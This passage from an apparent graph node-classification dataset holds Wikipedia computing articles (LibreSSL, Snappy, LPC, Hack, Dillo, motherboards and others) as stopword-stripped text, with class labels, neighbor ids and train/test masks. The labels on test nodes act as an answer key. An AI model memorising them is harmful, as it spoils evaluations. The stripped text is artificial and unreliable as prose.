unnecessary deprecated part openbsd 5.6 dual ec drbg algorithm suspected back door cut along support fips 140-2 standard required unused protocols insecure algorithms also removed including support fips 140-2 md4/md5 j-pake srp one complaints openssl number open bugs reported bug tracker gone unfixed years older bugs fixed libressl",
    "neighbors": [
      513,
      2050,
      4100,
      517,
      5636,
      510,
      9223,
      9744,
      8725,
      7702,
      2083,
      9764,
      6702,
      5176,
      7736,
      576,
      9281,
      7238,
      3657,
      8778,
      5710,
      10831,
      11345,
      8283,
      7264,
      10850,
      1637,
      9318,
      10341,
      9320,
      107,
      5230,
      7794,
      5749,
      2169,
      3707,
      1157,
      4746,
      8331,
      6797,
      1683,
      1688,
      11418,
      3742,
      10405,
      8358,
      4268,
      9394,
      7859,
      2228,
      9412,
      2245,
      5834,
      728,
      6361,
      3805,
      9451,
      1775,
      2804,
      1785,
      8954,
      251,
      4863,
      6403,
      1288,
      2825,
      5899,
      5391,
      1297,
      274,
      1810,
      1304,
      814,
      7983,
      9520,
      11569,
      3382,
      823,
      3404,
      11086,
      11088,
      5970,
      3422,
      8545,
      6519,
      3959,
      10105,
      8065,
      8582,
      10631,
      3465,
      1932,
      420,
      11693,
      1456,
      10161,
      1978,
      8640,
      1474,
      1993,
      6602,
      4562,
      6098,
      11221,
      5590,
      474,
      5084,
      477,
      8674,
      4071,
      5107,
      501,
      1526,
      2045,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7140,
    "label": 2,
    "text": "Snappy_(package_manager):snappy package manager snappy software deployment package management system developed canonical linux operating system packages called snaps tool using snapd work across range linux distributions allowing distro-agnostic upstream software packaging snappy originally designed ubuntu touch system designed work internet things cloud desktop computing snapcraft tool developing snap packages snap application packages software self-contained work across range linux distributions unlike traditional linux package management approaches like apt yum require specifically adapted packages linux distribution therefore adding delay application development deployment end-users snaps dependency app store obtained source therefore used upstream software deployment snaps deployed ubuntu versions linux ubuntu app store used default back-end stores enabled well developers use snaps create command line tools background services well desktop applications snap application upgrades via atomic operation deltas possible june 2016 snapd ported wide range linux distributions enable snaps used across linux distribution all-snap ubuntu core snapd also available progress arch linux centos debian fedora solus manjaro linux linux mint openembedded raspbian openwrt opensuse distribution able interpret snap metadata implement security expectations snap distribution-specific fashion snapcraft tool developers package programs snap format snappy snap file format single compressed filesystem based squashfs format mounted dynamically host operating system together declarative metadata interpreted snap system set appropriately shaped secure sandbox container application file format extension .snap snappy packaging deployed internet things environments ranging consumer-facing products enterprise device management gateways snappy included default ubuntu desktop images version 16.04 onwards developer screen capture tool peek discontinued support snap packages continuing support flatpak appimage stating developers systems administrators voiced complaints snap highly unsuitable mission-critical applications since autoupdates turned basic feature missing design choice snap developers led unexpected downtime services restart buggy software enters snap distribution system red hat employee adam williamson acknowledging bias criticized snap keeping server side closed source mechanism using third party servers sign contributor license agreement contribute development",
    "neighbors": [
      10760,
      7181,
      8213,
      8214,
      6680,
      9762,
      5670,
      3131,
      3649,
      10817,
      3654,
      1107,
      3667,
      2645,
      6227,
      4192,
      9324,
      6257,
      1138,
      5755,
      7293,
      10900,
      4775,
      7847,
      6828,
      3245,
      5819,
      190,
      6352,
      6361,
      741,
      231,
      7913,
      9455,
      7920,
      9971,
      6393,
      5369,
      11006,
      11525,
      2310,
      7435,
      7947,
      9487,
      788,
      1813,
      8476,
      6445,
      6446,
      7983,
      1842,
      823,
      2872,
      3918,
      4951,
      9564,
      2401,
      1379,
      5990,
      9063,
      362,
      8554,
      7020,
      10096,
      2930,
      1396,
      2955,
      2448,
      11669,
      1435,
      926,
      8112,
      439,
      6583,
      10172,
      9671,
      5067,
      463,
      975,
      2010,
      3550,
      6119,
      5096,
      8177,
      1522,
      2045,
      11263
    ],
    "mask": "Train"
  },
  {
    "node_id": 7141,
    "label": 2,
    "text": "Install_Party_des_Savoie:install party des savoie install party des savoie kind installfest social event aims popularize linux operating system libre software day people pays de savoie savoy upper savoy departements welcomed get familiar new desktop environment linux renowned ability reliable virus-free thus local public many ways discover concept free software traditionally install party des savoie takes place may various cities amongst two savoys instance annecy chambery 2010 edition local non-profit societies agu3l alpinux marmottux take active part organisation specific installfest 2011install party des savoie took place may 21 chambery jean-jacques rousseau media librairy lugs savoy gathered together linux mint debian edition lmde system adopted presented public live dvd installed computers first time france attempt visioconferencing made two different installfeists via videoconferencing tools ekiga xmpp protocol",
    "neighbors": [
      10242,
      7983,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7142,
    "label": 3,
    "text": "Hardware_scout:hardware scout hardware scout technique uses otherwise idle processor execution resources perform prefetching cache misses thread stalled cache miss processor pipeline checkpoints register file switches runahead mode continues issue instructions thread waiting memory thread execution run-ahead mode known scout thread data returns memory processor restores register file contents checkpoint switches back normal execution mode computation run-ahead mode discarded processor nevertheless scouting provides speedup memory level parallelism mlp increased cache lines brought cache hierarchy often used processor switches back normal mode sun rock processor later canceled used form hardware scout however computations run-ahead mode depend cache miss may retired immediately allows prefetching traditional instruction-level parallelism scouting simultaneous multithreading smt use hardware threads fight memory wall scouting scout thread runs instructions instruction stream instruction causes pipeline stall case smt smt thread executes instruction another context thus smt increases throughput processor scouting increases performance lowering number cache misses",
    "neighbors": [
      785,
      4241,
      7313,
      7699,
      6815,
      2210,
      5798,
      9126,
      2345,
      7218,
      10675,
      5948,
      4286,
      2113,
      8514,
      5956,
      4423,
      1480,
      7497,
      330,
      1866,
      10706,
      4308,
      2008,
      2264,
      2394,
      731,
      2140,
      4194,
      11618,
      3175,
      2536,
      5223,
      8810,
      4205,
      10734,
      1776,
      6774,
      7802,
      508,
      6909,
      8447
    ],
    "mask": "Test"
  },
  {
    "node_id": 7143,
    "label": 9,
    "text": "Object_type_(object-oriented_programming):object type object-oriented programming computer science object type a.k.a wrapping object datatype used object-oriented programming wrap non-object type make look like dynamic object object-oriented programming languages make distinction reference value types often referred objects non-objects platforms complex value types n't exist reasons runtime efficiency syntax semantic issues example java primitive wrapper classes corresponding primitive type etc languages like c++ little notion reference type thus use object type little interest boxing otherwise known wrapping process placing primitive type within object primitive used reference object example java change size array must fixed size one might desire class lists references dynamic objects—it list primitive types value types circumvent boxed dynamic objects added using generic parameterized types introduced j2se 5.0 type represented hand c primitive wrapper classes allows boxing value type returning generic reference boxed object always copy value object usually immutable unboxing object also returns copy stored value repeated boxing unboxing objects severe performance impact boxing dynamically allocates new objects unboxing boxed value longer used makes eligible garbage collection however modern garbage collectors default java hotspot garbage collector efficiently collect short-lived objects boxed objects short-lived performance impact may bad direct equivalence unboxed primitive type reference immutable boxed object type fact possible substitute primitive types program boxed object types whereas assignment one primitive another copy value assignment one reference boxed object another copy reference value refer object first reference however cause problems objects immutable semantically real difference two references object different objects unless look physical equality operations assignment arithmetic comparison logical operators one unbox boxed type perform operation re-box result needed thus possible store primitive types autoboxing term getting reference type value type type conversion either implicit explicit compiler automatically supplies extra source code creates object example versions java prior j2se 5.0 following code compile compilers prior 5.0 would accept last line reference objects surface different forth convert one manually instantiate integer object j2se 5.0 compiler accept last line automatically transform integer object created store value means j2se 5.0 something like compile b unboxed integer values summed result autoboxed new finally stored inside variable equality operators used way equality operators already defined reference types equality references test equality value boxed type one must still manually unbox compare primitives use method another example j2se 5.0 allows programmer treat collection contained values instead objects contradict said collection still contains references dynamic objects list primitive types must instead however compiler automatically transforms code list silently receive objects source code mentions primitive values example programmer write think added list compiler actually transformed line unboxing refers getting value associated given object type conversion either implicit explicit compiler automatically supplies extra source code retrieves value object either invoking method object means example versions java prior j2se 5.0 following code compile c n't support automatic unboxing meaning java n't separate set primitive types object types types primitive object version java automatically implemented c compiler either primitive value types object reference types languages automatic boxing downcast automatically i.e following code wo n't compile c java modern object pascal yet another way perform operations simple types close boxing called type helpers freepascal record helpers delphi freepascal delphi mode. br dialects mentioned object pascal compile-to-native languages miss features c java implement notably run-time type inference strongly typed variables. br feature related boxing. br allows programmer use constructs like",
    "neighbors": [
      2304,
      7889,
      3562,
      5677
    ],
    "mask": "Test"
  },
  {
    "node_id": 7144,
    "label": 9,
    "text": "LPC_(programming_language):lpc programming language lpc short lars pensjö c object-oriented programming language derived c developed originally lars pensjö facilitate mud building lpmuds though designed game development flexibility led used variety purposes evolution language pike lpc syntax places family c-like languages c c++ strongest influences almost everything lpc object however lpc precisely use concept class mudos something called class really struct instead lpc objects blueprint objects clones blueprint objects prototype-based programming model one treat blueprint object much class object-oriented languages object variables attributes functions methods variables store object state functions executable routines called object object uniquely defined name file comes plus clone numeric identifier typical implementation clone file codice_1 third clone created current run session codice_2 blueprint object corresponding codice_1 simply codice_4 mud game common objects include rooms weapons armor non-player character npcs mudlibs define inheritable objects common things lpmud 2.4.5 mudlib example parent object rooms codice_5 lpc possible syntactically declare class-only instance-only methods attributes functions variables may accessed identically blueprints clones example codice_6 would call codice_7 function directly blueprint instance codice_8 however controversial mechanism many drivers called shadowing allows instance methods emulated extent permitting one object overlay function set onto another effect interposing external function calls shadowed object direct external access variables also supported interaction objects carried function calls notwithstanding data structures pointed variables independent objects changes visible objects referencing data structures simultaneously drivers privileged functions allowing cumbersome form external variable access permits inspection mutation lpc generally used code muds 'rooms often created objects store information describing particular scene along exits point room objects common usage lpc uses game related possible following example shows simple traditional room leverages functions defined mudlib object codice_5 however mudlibs define determine rooms way method defining room first line tells object inherit functionality codice_5 object example assumes codice_5 object defines functions codice_12 codice_13 example contains single function codice_14 drivers call set call codice_14 allow object initialize startup values standard constructor case example calls functions set basic room attributes inherited codice_5 functions called highly dependent mudlib use since mudlib defines actual room parent drivers also support applying type modifiers inherit statements causing inherited object behave respect inheritor type modifier applied functions and/or variables appropriate term object variable used means variable element object i.e attribute opposed local variable exists within function block global variable nonexistent lpc — someone speaks global variable reference lpc probably mean object variable primitive lpc types int string status float etc passed value data structure types object array mapping class struct passed reference feature powerful also lead security holes muds people building world generally less trusted staff running game object passes mapping sensitive values like access control information author another object modify thus increase access rights mudlib developers server administrators thus careful passing complex types lower access objects lpc environments generally categorize functions several major types according implemented lpc implementations generally master object specific lpc object loaded first lpc driver essentially controls happen past point master object typically tell driver simul_efun object preload objects need present startup define functions called object loaded otherwise configure driver operation driver refer back master object needs interact central point reference running environment accepting network connections handling errors validating attempts perform privileged operations",
    "neighbors": [
      9345,
      8582,
      5521,
      1946,
      4134,
      5677,
      11067,
      5053,
      8644,
      7237,
      8262,
      7894,
      7646,
      6502,
      11625,
      7019,
      5239,
      11386,
      2556,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7145,
    "label": 4,
    "text": "Gordon_Blake:gordon blake gordon aylesworth blake july 22 1910 – september 1 1997 lieutenant general united states air force served director national security agency 1962 1965 gordon aylesworth blake born charles city iowa july 22 1910 son george cecelia blake graduated high school charles city appointed united states military academy late gilbert n. haugen 1927 graduating june 11 1931 commissioned second lieutenant coast artillery corps detailed student officer pilot training october 1932 blake completed primary advanced flying schools transferred air corps january 25 1933 assigned pursuit squadron barksdale field louisiana entering signal school fort monmouth new jersey july 1934 completed communications officers course following june assigned communications instructor air corps technical school chanute field illinois going hawaii february 1939 blake communications officer 18th composite wing september 1941 acted communications officer first land-based aircraft flight hawaii philippines flight made b-17 bombers sent philippines reinforcements flew pioneer route – midway island wake island port moresby new guinea darwin australia clark field philippine islands members flight awarded distinguished flying cross december 7 1941 blake base operations officer rank major hickam field japanese attack pearl harbor awarded silver star gallantry action day became operations officer seventh air force base command promoted lieutenant colonel spent first months world war ii supervising operation airplane ferry route australia via christmas island – canton island – fiji – new caledonia october 1942 blake shifted back communications work commanded army airways communications system pacific rest world war ii exception period october 1943 january 1944 temporary duty alaska established air communications office alaska promoted colonel november 1942 august 28 1945 accompanied special 150-man task force japan prepare airborne occupation troop landings august 30 work world war ii blake awarded legion merit admiral chester w. nimitz plus oak leaf cluster legion merit war department air medal oak leaf cluster battle stars participation following campaigns central pacific eastern mandates new guinea north solomons guadalcanal papua south philippines luzon western pacific returned overseas november 1945 january 1946 appointed deputy commander airways air communications service langley field virginia entering air war college maxwell air force base alabama august 1947 blake graduated following june went research development work wright-patterson air force base ohio 1948 1951 electronics subdivision engineering division served chief armament laboratory summer 1951 placed charge 12 development laboratories promoted brigadier general final assignment wright field vice-commander june 1952 january 1953 transferred air force headquarters january 1953 blake appointed deputy director communications office deputy chief staff operations becoming director communications following month many changes united states air force system global communications navigation including pioneer operational circuits using tropospheric scatter communications first time carried tour director communications blake named assistant deputy chief staff operations june 2 1956 capacity served permanent joint board defense canada — us many defense projects dewline radar network planned two countries latter part washington assignment given aeronautical rating command pilot promoted major general highest permanent rank regular service blake left washington january 4 1957 become commander united states air force security service major component united states air force headquarters san antonio texas awarded air force distinguished service medal exceptionally meritorious conduct performance outstanding service command september 1 1959 blake assigned vice-commander-in-chief chief staff pacific air forces air arm joint pacific command headquarters hawaii blake came headquarters continental air command july 1961 commander-designate assumed command continental air command september 30 1961 became lieutenant general october 1 1961 blake assumed position director national security agency fort george g. meade maryland july 1 1962 held retirement 1965 us air force aircraft save award named awarded action taken air traffic controller airfield manager results safe recovery imperiled airborne aircraft help given endangered aircraft ground",
    "neighbors": [
      6017,
      8726,
      1189,
      9517,
      1838,
      5308,
      1986,
      6343,
      6344,
      11335,
      7119,
      7759,
      7887,
      3154,
      8276,
      7893,
      991,
      7137,
      3305,
      2419,
      6005,
      6136,
      766
    ],
    "mask": "Test"
  },
  {
    "node_id": 7146,
    "label": 3,
    "text": "Java_bytecode_instruction_listings:java bytecode instruction listings list instructions make java bytecode abstract machine language ultimately executed java virtual machine java bytecode generated languages running java platform notably java programming language note referenced value refers 32-bit int per java instruction set",
    "neighbors": [
      4358,
      910,
      10526,
      5031,
      5677,
      6074,
      10683,
      5567,
      9665,
      6860,
      3920,
      4960,
      2658,
      3560,
      3561,
      3562,
      5872,
      9078,
      3705,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 7147,
    "label": 9,
    "text": "Hack_(programming_language):hack programming language hack programming language hiphop virtual machine hhvm created facebook dialect php language implementation open-source licensed mit license hack allows programmers use dynamic typing static typing kind type system called gradual typing also implemented programming languages actionscript hack type system allows types specified function arguments function return values class properties however types local variables always inferred specified hack introduced march 20 2014 announcement new programming language facebook already implemented code battle tested large portion web site hack designed interoperate seamlessly php widely used open-source scripting language focus web development embedded html majority valid php scripts also valid hack however numerous less frequently used php features language constructs supported hack hack extends type hinting available php 5 introduction static typing adding new type hints example scalar types integer string well extending use type hints example class properties function return values however types local variables specified since hack uses gradual typing system default mode type annotations mandatory even places inferred type system assume author correct admit code however strict mode available requires annotations thus enforces fully sound code basic file structure hack script similar php script changes hack file n't include codice_1 opening markup tag forbids using top-level declarations thus would need write code within entrypoint function entrypoint functions automatically executed top-level file automatically executed file included via include require autoloader like functions hack function names must unique within project – i.e projects multiple entrypoints call main « __entrypoint » function main void script similar php executed following output sent browser hello world important point note unlike php hack html code mix normally mix php html code together file like html /html type code supported hack either xhp another template engine needs used hack allows types specified function arguments function return values functions hack thus annotated types like following // hack functions annotated types function negate bool x bool",
    "neighbors": [
      3462,
      8582,
      11017,
      1034,
      6154,
      6795,
      10506,
      9614,
      10387,
      1435,
      6555,
      9245,
      7326,
      2465,
      3876,
      4777,
      2348,
      5677,
      9518,
      7983,
      9780,
      5047,
      6074,
      10555,
      190,
      6718,
      7359,
      6338,
      5059,
      2372,
      8644,
      1222,
      8262,
      1353,
      5833,
      4171,
      8524,
      7292,
      7889,
      2130,
      11219,
      5588,
      7293,
      2519,
      10587,
      477,
      11357,
      3553,
      6502,
      10470,
      7785,
      8554,
      5612,
      10991,
      10097,
      8691,
      3960,
      3705,
      11259,
      2556,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7148,
    "label": 9,
    "text": "Fortress_(programming_language):fortress programming language fortress discontinued experimental programming language high-performance computing created sun microsystems funding darpa high productivity computing systems project one language designers guy l. steele jr. whose previous work includes scheme common lisp java name fortress intended connote secure fortran i.e. language high-performance computation provides abstraction type safety par modern programming language principles language features included implicit parallelism unicode support concrete syntax similar mathematical notation language designed similar fortran syntactically resembles scala standard ml haskell fortress designed outset multiple syntactic stylesheets source code rendered ascii text unicode prettied image would allow support mathematical symbols symbols rendered output easier reading emacs-based tool called fortify transforms ascii-based fortress source code latex output fortress also designed highly parallel rich functionality contained within libraries drawing java example codice_1 loop construct parallel operation would necessarily iterate strictly linear manner depending underlying implementation however codice_1 construct library function could replaced another version programmer liking rather built language fortress designers made syntax close possible pseudocode analyzed hundreds computer science mathematics papers courses books journals using pseudocode extract common usage patterns english language standard mathematical notation used represent algorithms pseudocode made compiler trying maintain one-to-one correspondence pseudocode executable fortress fortress one three languages created funding high productivity computing systems project others x10 ibm chapel cray inc november 2006 darpa approved funding third phase hpcs project x10 chapel funded fortress leading uncertainty future fortress january 2007 fortress transformed open-source project open-source community people outside sun write fortress code test using open-source fortress interpreter version 1.0 fortress language specification released april 2008 along compliant implementation targeting java virtual machine july 2012 steele announced active development fortress would cease brief winding-down period citing complications using fortress type system existing virtual machines fortress version archetypal hello world program presented fortress reference card export statement makes program executable every executable program fortress must implement run function file program saved compilation must name one specified initial component statement println function outputs hello world words screen",
    "neighbors": [
      3328,
      9731,
      7301,
      7432,
      1801,
      5129,
      4235,
      3980,
      2062,
      15,
      8079,
      1809,
      9875,
      2710,
      5148,
      7580,
      7326,
      9343,
      7072,
      8994,
      1316,
      3876,
      10789,
      1707,
      5677,
      7341,
      3247,
      7983,
      9133,
      6322,
      6962,
      2871,
      11129,
      6718,
      7104,
      9665,
      2242,
      6338,
      10436,
      5830,
      5703,
      1480,
      5833,
      8007,
      8262,
      1613,
      2895,
      597,
      3285,
      10327,
      10200,
      5852,
      5471,
      4960,
      9955,
      10083,
      9701,
      1382,
      11239,
      4840,
      9320,
      11363,
      363,
      5612,
      5741,
      7022,
      11626,
      5872,
      5233,
      8179,
      9333,
      631,
      3960,
      3705,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 7149,
    "label": 3,
    "text": "Integration_platform:integration platform integration platform software integrates different applications services differentiates enterprise application integration focus supply chain management uses idea system integration create environment engineers integration platforms built components purchased pre-built product ready installation procured integration platform service ipaas offering integration platform tries create environment engineers integration platform typically contains set functional components integration platform focus designed helpful engineers intention map business processes integrate tools supply chain management therefore related systems",
    "neighbors": [
      8581,
      3878,
      530,
      10099,
      6809
    ],
    "mask": "None"
  },
  {
    "node_id": 7150,
    "label": 5,
    "text": "Voodoo_Chat:voodoo chat voodoo chat opened late december 2001 text-based chat program voice chat features created wake excite virtual places closure due company bankruptcy following acquisition home network impending closure excite virtual places new chat venue needed house soon displaced users service initially chief software engineer excite chat service tom lang proposed subscription based service using virtual places software received response lotus software regarding license two months without word subscription based service idea considered dead development alternative chat venue mike parniak using original software rather existing virtual places software began mid-2001 two months creation would later known voodoo chat lang finally received word would granted license use virtual places subscription based service development voodoo chat continued despite removal lang obstacles first version chat opened december 2001 originally voodoo chat run server hierarchy within overlay network today service works little differently voodoo chat apart text-based chatting system also avatars images representing oneself displayed top screen foreground web page said images size width height though programs defaults set 300x300 file size limit 15kb images also effects supported in-house flipping rotating turning black white inverting pixelating blur grow shrink october 9 2007 voice chat come current version voodoo sequenced voice chat works sending clips 20 seconds voice users chat room non-real-time even streamed voice chat 'realtime given high latency typically encountered 'seems likewise nobody tests expressed feeling things 'out sync problematic way voodoo chat uses two methods security first encryption second use system hashes voodoo method encryption encrypts transfers data program increase privacy deter hackers far according website none cracked protocol plenty tried voodoo client generates set system hashes pieces serial numbers within hardware users computer gathered program starts transmitted user attempts log users hashes checked global hash ban list king checked banned hash list specific server 're logging system hash matches either ban list user barred service",
    "neighbors": [
      1632,
      8998,
      3629,
      6797,
      7983,
      4472,
      5435,
      4956
    ],
    "mask": "Test"
  },
  {
    "node_id": 7151,
    "label": 3,
    "text": "Motherboard:motherboard motherboard sometimes alternatively known mainboard main circuit board system board baseboard planar board logic board colloquially mobo main printed circuit board pcb found general purpose computers expandable systems holds allows communication many crucial electronic components system central processing unit cpu memory provides connectors peripherals unlike backplane motherboard usually contains significant sub-systems central processor chipset input/output memory controllers interface connectors components integrated general purpose use applications motherboard specifically refers pcb expansion capability name suggests board often referred mother components attached often include peripherals interface cards daughtercards sound cards video cards network cards hard drives forms persistent storage tv tuner cards cards providing extra usb firewire slots variety custom components similarly term mainboard applied devices single board additional expansions capability controlling boards laser printers televisions washing machines mobile phones embedded systems limited expansion abilities prior invention microprocessor digital computer consisted multiple printed circuit boards card-cage case components connected backplane set interconnected sockets old designs copper wires discrete connections card connector pins printed circuit boards soon became standard practice central processing unit cpu memory peripherals housed individual printed circuit boards plugged backplane ubiquitous s-100 bus 1970s example type backplane system popular computers 1980s apple ii ibm pc published schematic diagrams documentation permitted rapid reverse-engineering third-party replacement motherboards usually intended building new computers compatible exemplars many motherboards offered additional performance features used upgrade manufacturer original equipment late 1980s early 1990s became economical move increasing number peripheral functions onto motherboard late 1980s personal computer motherboards began include single ics also called super i/o chips capable supporting set low-speed peripherals keyboard mouse floppy disk drive serial ports parallel ports late 1990s many personal computer motherboards included consumer-grade embedded audio video storage networking functions without need expansion cards higher-end systems 3d gaming computer graphics typically retained graphics card separate component business pcs workstations servers likely need expansion cards either robust functions higher speeds systems often fewer embedded components laptop notebook computers developed 1990s integrated common peripherals even included motherboards upgradeable components trend would continue smaller systems introduced turn century like tablet computer netbook memory processors network controllers power source storage would integrated systems motherboard provides electrical connections components system communicate unlike backplane also contains central processing unit hosts subsystems devices typical desktop computer microprocessor main memory essential components connected motherboard components external storage controllers video display sound peripheral devices may attached motherboard plug-in cards via cables modern microcomputers increasingly common integrate peripherals motherboard important component motherboard microprocessor supporting chipset provides supporting interfaces cpu various buses external components chipset determines extent features capabilities motherboard modern motherboards include additionally nearly motherboards include logic connectors support commonly used input devices usb mouse devices keyboards early personal computers apple ii ibm pc included minimal peripheral support motherboard occasionally video interface hardware also integrated motherboard example apple ii rarely ibm-compatible computers ibm pc jr. additional peripherals disk controllers serial ports provided expansion cards given high thermal design power high-speed computer cpus components modern motherboards nearly always include heat sinks mounting points fans dissipate excess heat motherboards produced variety sizes shape called computer form factor specific individual computer manufacturers however motherboards used ibm-compatible systems designed fit various case sizes desktop computer motherboards use atx standard form factor — even found macintosh sun computers built commodity components case motherboard power supply unit psu form factor must match though smaller form factor motherboards family fit larger cases example atx case usually accommodate microatx motherboard.computers generally use highly integrated miniaturized customized motherboards one reasons laptop computers difficult upgrade expensive repair often failure one laptop component requires replacement entire motherboard usually expensive desktop motherboard cpu socket central processing unit slot electrical component attaches printed circuit board pcb designed house cpu also called microprocessor special type integrated circuit socket designed high pin counts cpu socket provides many functions including physical structure support cpu support heat sink facilitating replacement well reducing cost importantly forming electrical interface cpu pcb cpu sockets motherboard often found desktop server computers laptops typically use surface mount cpus particularly based intel x86 architecture cpu socket type motherboard chipset must support cpu series speed steadily declining costs size integrated circuits possible include support many peripherals motherboard combining many functions one pcb physical size total cost system may reduced highly integrated motherboards thus especially popular small form factor budget computers typical motherboard different number connections depending standard form factor standard modern atx motherboard typically two three pci-express 16x connection graphics card one two legacy pci slots various expansion cards one two pci-e 1x superseded pci standard eatx motherboard two four pci-e 16x connection graphics cards varying number pci pci-e 1x slots sometimes also pci-e 4x slot vary brands models motherboards two pci-e 16x slots allow 2 monitors without special hardware use special graphics technology called sli nvidia crossfire amd allow 2 4 graphics cards linked together allow better performance intensive graphical computing tasks gaming video editing etc motherboards generally air cooled heat sinks often mounted larger chips northbridge modern motherboards insufficient improper cooling cause damage internal components computer cause crash passive cooling single fan mounted power supply sufficient many desktop computer cpu late 1990s since required cpu fans mounted heat sinks due rising clock speeds power consumption motherboards connectors additional computer fans integrated temperature sensors detect motherboard cpu temperatures controllable fan connectors bios operating system use regulate fan speed alternatively computers use water cooling system instead many fans small form factor computers home theater pcs designed quiet energy-efficient operation boast fan-less designs typically requires use low-power cpu well careful layout motherboard components allow heat sink placement 2003 study found spurious computer crashes general reliability issues ranging screen image distortions i/o read/write errors attributed software peripheral hardware aging capacitors pc motherboards ultimately shown result faulty electrolyte formulation issue termed capacitor plague standard motherboards use electrolytic capacitors filter dc power distributed around board capacitors age temperature-dependent rate water based electrolytes slowly evaporate lead loss capacitance subsequent motherboard malfunctions due voltage instabilities capacitors rated 2000 hours operation expected design life roughly doubles every lifetime 3 4 years expected however many manufacturers deliver substandard capacitors significantly reduce life expectancy inadequate case cooling elevated temperatures around cpu socket exacerbate problem top blowers motherboard components kept effectively doubling motherboard lifetime mid-range high-end motherboards hand use solid capacitors exclusively every 10 °c less average lifespan multiplied approximately three resulting 6-times higher lifetime expectancy capacitors may rated 5000 10000 12000 hours operation extending projected lifetime comparison standard solid capacitors motherboards contain non-volatile memory initialize system load startup software usually operating system external peripheral device microcomputers apple ii ibm pc used rom chips mounted sockets motherboard power-up central processor would load program counter address boot rom start executing instructions rom instructions initialized tested system hardware displayed system information screen performed ram checks loaded initial program peripheral device none available computer would perform tasks memory stores display error message depending model design computer rom version example apple ii original ibm pc microsoft cassette basic rom would start program could loaded disk modern motherboard designs use bios stored eeprom chip soldered socketed motherboard boot operating system non-operating system boot programs still supported modern ibm pc-descended machines nowadays assumed boot program complex operating system microsoft windows linux power first supplied motherboard bios firmware tests configures memory circuitry peripherals power-on self test post may include testing following things recent motherboards bios may also patch central processor microcode bios detects installed cpu one errata published many motherboards use update bios called uefi",
    "neighbors": [
      3586,
      3588,
      5642,
      9739,
      10260,
      6165,
      8730,
      7712,
      548,
      2094,
      5681,
      7220,
      11331,
      3142,
      7247,
      11347,
      4695,
      9307,
      10337,
      7788,
      8301,
      2161,
      7794,
      1651,
      8834,
      3722,
      4246,
      6806,
      8345,
      4252,
      4767,
      2213,
      4264,
      4270,
      5300,
      9400,
      698,
      7354,
      2237,
      6854,
      3783,
      3283,
      9427,
      7893,
      9438,
      5859,
      9955,
      2791,
      1260,
      5356,
      4334,
      1776,
      2803,
      5368,
      8952,
      2811,
      9475,
      8452,
      4872,
      5386,
      780,
      5901,
      3352,
      799,
      4895,
      1322,
      3883,
      7983,
      1329,
      3892,
      2874,
      7998,
      6978,
      8004,
      3911,
      2383,
      9551,
      9557,
      1369,
      9057,
      4451,
      8035,
      11623,
      11627,
      10095,
      4465,
      3445,
      1400,
      6014,
      3457,
      6020,
      3464,
      7058,
      5523,
      10130,
      10644,
      8090,
      2463,
      9122,
      10658,
      11183,
      8625,
      8629,
      1463,
      6587,
      10173,
      9665,
      10691,
      9157,
      455,
      7113,
      7122,
      7635,
      4565,
      10715,
      7132,
      2525,
      3037,
      1515,
      1005,
      6129,
      2551,
      5629,
      1535
    ],
    "mask": "None"
  },
  {
    "node_id": 7152,
    "label": 5,
    "text": "Dillo:dillo dillo minimalistic web browser particularly intended older slower computers embedded systems supports plain html/xhtml css rendering images http scripting ignored entirely current versions dillo run linux bsd os x irix cygwin due small size browser choice several space-conscious linux distributions released gnu general public license dillo free software chilean software engineer jorge arellano cid conceived dillo project late 1999 publishing first version dillo december year primary goal creating dillo democratize access information arellano cid believed one buy new computer pay broadband order enjoy world wide web end designed dillo small fast efficient capable performing well even intel 80486 cpu dial-up internet access dillo originally written c programming language gtk+ gui toolkit first versions based earlier browser called armadillo hence name dillo 2 written c c++ components fast light toolkit fltk released october 14 2008 text antialiasing support character sets latin-1 http compression capability improved page rendering added move fltk gtk+ also removed many project dependencies reduced dillo memory footprint 50 2011 dillo-3.x released using fltk-1.3 according changelog change prompted part lack official release fltk-2 stopped dillo-2 inclusion lightweight distributions would otherwise suitable jorge arellano cid still dillo lead developer today dillo funded private donations efforts obtain public grants corporate sponsors unsuccessful lack funding led slowdown development 2006 complete stop 2007 project restarted 2008 two months later received €115 donation distrowatch features dillo include bookmarks tabbed browsing support jpeg png including alpha transparency gif images partial support css introduced release 2.1 settings default fonts background color downloads folder home page customizable configuration files cookies supported disabled default due privacy concerns web browsers retain web cache history program closed dillo automatically clears improve privacy performance developer tool called bug meter provided lower-right corner clicked displays information validation problems unclosed tags dillo found web page unlike browsers dillo quirks mode improve compatibility web pages use invalid html instead dillo processes web pages according published web standards 2003 two linux enthusiasts successfully ran dillo intel 486 processor demonstrated even meager hardware dillo could render http //news.bbc.co.uk/ 10–15 seconds furthermore dillo run variety software platforms including linux bsd solaris mac os x dos handheld devices however dillo developers made little effort make browser work microsoft windows arellano cid stated windows goes dillo goal democratization artificially increasing hardware requirements software costs nevertheless dillo reported work windows via cygwin additionally dillo-win32 project port dillo windows defunct d+ browser dplus continues dillo-win32 left forked final dillo-win32 release 3.0p9 attempt maintain upstream compatibility dillo last version 0.5b oct 15 2013 dillo support javascript java flash right-to-left text complex text layout support frames also limited dillo presents link frame allow user view one time plug-in add https support likewise development reviews dillo praised extraordinary speed noted speed comes price visible cost dillo inability display complex web pages meant 2008 review linux.com commented dillo user interface may intimidating new users pointed scarcity plug-ins dillo dillo global usage share less one hundredth one percent many deficiencies attributed simple lack manpower behind development dillo however browser choice several space-conscious linux distributions damn small linux feather linux vectorlinux antix mustang linux",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      9757,
      7713,
      10791,
      11305,
      9770,
      5677,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      5707,
      2125,
      10834,
      6231,
      8281,
      6747,
      1642,
      9834,
      9841,
      115,
      9843,
      119,
      4728,
      637,
      1664,
      2182,
      6797,
      10910,
      8351,
      7340,
      9394,
      9908,
      185,
      11449,
      4797,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      8443,
      9987,
      7943,
      2321,
      278,
      7965,
      292,
      6436,
      1834,
      7983,
      823,
      10057,
      11082,
      2893,
      8557,
      6528,
      3971,
      3462,
      8584,
      7572,
      5026,
      11693,
      944,
      5054,
      9151,
      6086,
      4048,
